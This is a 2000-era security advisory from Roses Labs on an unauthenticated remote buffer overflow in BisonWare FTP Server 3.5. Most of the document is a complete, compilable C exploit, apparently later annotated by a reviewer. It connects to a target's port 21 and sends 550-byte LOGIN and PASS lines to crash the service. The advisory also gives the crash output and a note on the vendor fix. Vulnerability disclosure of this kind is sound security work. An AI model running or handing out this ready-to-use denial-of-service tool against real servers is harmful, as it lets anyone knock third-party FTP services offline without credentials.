"BisonWare is an FTP server that runs on the Windows platform. An intruder can
crash the FTP service remotely without logging in: no legitimate account on
the system is needed to attack the server, so the issue is reachable by any
host that can connect to port 21."

Conde Vampiro
Roses Labs / w00w00
http://www.roses-labs.com
Advanced Security Research.


                Roses Labs Security Advisory
                ----------------------------

  Author: Conde Vampiro
  Roses Labs Advisory Code: RLA002
  Date: 2/29/2000.
  Software: BisonWare FTP Server V3.5
  Platform: Windows 9x/NT. 
  Risk: Remote buffer overflow that crashes the
  FTP server (unauthenticated denial of service).
  Arbitrary code execution has not been demonstrated;
  the reported fault is a read access violation, so
  control of execution is unconfirmed.

  ------------
  Introduction
  ------------

        Bison FTP Server is an FTP server that
  runs on Windows platforms. An unauthenticated
  intruder can launch an attack that crashes it.

  ------
  Detail
  ------

        Sending a "LOGIN" line and a "PASS" line of 550 characters
  each crashes the FTP server (RFC 959 names the login commands
  USER and PASS; the proof of concept below sends the literal
  "LOGIN", as published). The server reports this error:

  "Exception EAccessViolation in module BISONFTP.EXE at 
   0A0D4858. Access violation at address 0A0D5858. Read of 
   address 0A0D5858."

  ----
  Code 
  ----

        Warning: neither Roses Labs nor the author accept
  any responsibility for the use of this code. Running it
  against a vulnerable host will crash the target FTP server.

------- CODE START -------

/*
 * FILE: rlxbison.c
 * CODER: Conde Vampiro.
 * DATE: 2/29/2000.
 * ABSTRACT: Remote DoS of BISON FTP Server 3.5
 *
 * Compile: gcc rlxbison.c -o rlbison
 *
 * Roses Labs / w00w00
 * http://www.roses-labs.com
 * Advanced Security Research.
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

/* Defines */

#define MAX 551         /* size of the fill buffer; crap(MAX) builds the payload (advisory: 550 chars) */
#define MAXDATA 1024    /* size of the receive buffer and of the outgoing command line */

/* Global variables */

int sock;                       /* TCP socket connected to the target's port 21 */
int i;                          /* loop index used by crap() */
char datacrap[MAX];             /* fill buffer returned by crap(); sized MAX, so a NUL terminator only fits if fewer than MAX bytes are filled */
char *temp;                     /* points at datacrap after crap() */
char tempdata[MAXDATA];         /* receive buffer for the server banner; its contents are never inspected */
char buf[MAXDATA];              /* outgoing FTP command line built with sprintf() */
struct hostent *host;           /* not referenced anywhere in this listing; resolve() uses its own local */
struct sockaddr_in KillFTP;     /* target address (AF_INET, port 21) */

/* Prototypes */

unsigned long resolve(char *host_name);
char *crap(int num);

/* Main */

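/*
 * Entry point: connect to <Host>:21, read the banner, then send the two
 * oversized command lines the advisory describes.
 *
 * argv[1] is the target host (dotted quad or DNS name).  Exits with -1 on
 * usage, resolution, socket, connect or send failure; returns 0 once the
 * payload has been sent.  Output goes to stdout, as in the original.
 */
int main(int argc, char *argv[]) {
        ssize_t n;
        int rc;

        if(argc < 2) {
                printf("Usage: %s <Host>\n", argv[0]);
                exit(-1);
        }

        /* Build the target address.  resolve() returns 0 for an unknown host,
         * so 0.0.0.0 is rejected as well. */
        memset(&KillFTP, 0, sizeof(KillFTP));
        KillFTP.sin_family=AF_INET;
        KillFTP.sin_addr.s_addr=resolve(argv[1]);
        if(!KillFTP.sin_addr.s_addr) {
                printf("Host Unknown: %s\n",argv[1]);
                exit(-1);
        }
        KillFTP.sin_port=htons(21);

        sock=socket(AF_INET, SOCK_STREAM, 0);
        if(sock < 0) {
                printf("Error creating socket!!\n");
                exit(-1);
        }
        if(connect(sock,(struct sockaddr *)&KillFTP, sizeof(KillFTP)) != 0) {
                printf("Couldn't connect to %s on port 21,\n", argv[1]);
                close(sock);
                exit(-1);
        }

        printf("Roses Labs Bison FTP Xploit\n");
        printf("Remote crashing code!!!\n");

        /* Read the greeting banner.  Zero or negative means the server hung up
         * (or errored) before anything was sent, so there is nothing to test. */
        n = recv(sock,tempdata,sizeof(tempdata),0);
        if (n <= 0) {
                printf("No banner from %s; connection closed before the payload was sent\n", argv[1]);
                close(sock);
                exit(-1);
        }
        /* Give a multi-line banner a moment to arrive, then drain whatever is
         * there without blocking: an unconditional second recv() hangs forever
         * when the banner is a single line. */
        sleep(1);
        (void)recv(sock,tempdata,sizeof(tempdata),MSG_DONTWAIT);

        /* Payload: up to MAX-1 (= 550) 'X' bytes, the length the advisory
         * reports.  The %.*s precision bounds the read at MAX-1 bytes so an
         * unterminated fill buffer cannot make snprintf() read past datacrap.
         * NOTE(review): RFC 959 defines USER/PASS and CRLF line endings; the
         * literal "LOGIN" and bare "\n" are kept exactly as the advisory
         * published them. */
        temp=crap(MAX);
        rc = snprintf(buf,sizeof(buf),"LOGIN %.*s\n",MAX - 1,temp);
        if (rc < 0 || (size_t)rc >= sizeof(buf) || send(sock,buf,(size_t)rc,0) != (ssize_t)rc) {
                printf("Error sending LOGIN to %s\n", argv[1]);
                close(sock);
                exit(-1);
        }
        rc = snprintf(buf,sizeof(buf),"PASS %.*s\n",MAX - 1,temp);
        if (rc < 0 || (size_t)rc >= sizeof(buf) || send(sock,buf,(size_t)rc,0) != (ssize_t)rc) {
                printf("Error sending PASS to %s\n", argv[1]);
                close(sock);
                exit(-1);
        }

        /* The original close() sat after exit() and never ran. */
        if(close(sock)) {
                printf("Error closing socket!!\n");
                exit(-1);
        }
        /* Nothing here verifies that the server died; only report what was done. */
        printf("Payload sent to %s; check whether the FTP server is still responding\n",argv[1]);
        return(0);
}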

/* Functions */

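/*
 * Translate host_name (dotted quad or DNS name) to an IPv4 address.
 *
 * Returns the address in network byte order, or 0 when host_name is NULL or
 * empty, cannot be resolved, or resolves to something other than a 4-byte
 * AF_INET entry.  0.0.0.0 also yields 0 and is therefore indistinguishable
 * from failure; main() already treats 0 as "unknown host", so this matches.
 * Numeric input is parsed with inet_pton(), which unlike inet_addr() reports
 * failure out of band (inet_addr()'s INADDR_NONE is also the valid address
 * 255.255.255.255).
 */
unsigned long resolve(char *host_name) {
        struct in_addr addr;
        struct hostent *ent;

        if (host_name == NULL || host_name[0] == '\0')
                return(0);
        if (inet_pton(AF_INET, host_name, &addr) == 1)
                return(addr.s_addr);
        ent = gethostbyname(host_name);
        /* Guard the copy: accept only an AF_INET entry whose address is exactly
         * sizeof(addr) bytes and is actually present. */
        if (ent == NULL || ent->h_addrtype != AF_INET
            || ent->h_length != (int)sizeof(addr)
            || ent->h_addr_list[0] == NULL)
                return(0);
        memcpy(&addr, ent->h_addr_list[0], sizeof(addr));
        return(addr.s_addr);
}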

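/*
 * Fill the shared datacrap[] buffer with 'X' and return it as a C string.
 *
 * num is the number of 'X' bytes requested.  The count is clamped so that a
 * NUL terminator always fits inside datacrap: the original filled all MAX
 * bytes when called as crap(MAX), leaving the buffer unterminated for the
 * "%s" formatting that follows.  crap(MAX) therefore yields MAX-1 (= 550)
 * bytes, the length the advisory reports.  A negative num yields "".
 * Returns datacrap (static storage, overwritten by the next call).
 */
char *crap(int num) {
        size_t cap = sizeof(datacrap) - 1;   /* keep one byte for the terminator */
        size_t n = (num < 0) ? 0 : (size_t)num;

        if (n > cap)
                n = cap;
        memset(datacrap, 'X', n);
        datacrap[n] = '\0';
        return(datacrap);
}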

/* w00w00 E0F */

------- CODE END -------

  ---   
  Fix
  ---

        The problem is stated to be fixed in V4.1, which had not
  been released when this advisory was written. Until the fixed
  version is installed, the service is exposed to any host that
  can reach port 21, since no account is required to trigger the crash.

  ----
  Note  
  ----

        This bug was found using Cyber Host
  Auditor (CHA). CHA is a security tool written by
  Roses Labs to discover, in an easy way, DoS
  conditions and possible buffer overflows.

  Roses Labs / w00w00
  http://www.roses-labs.com
  Advanced Security Research.
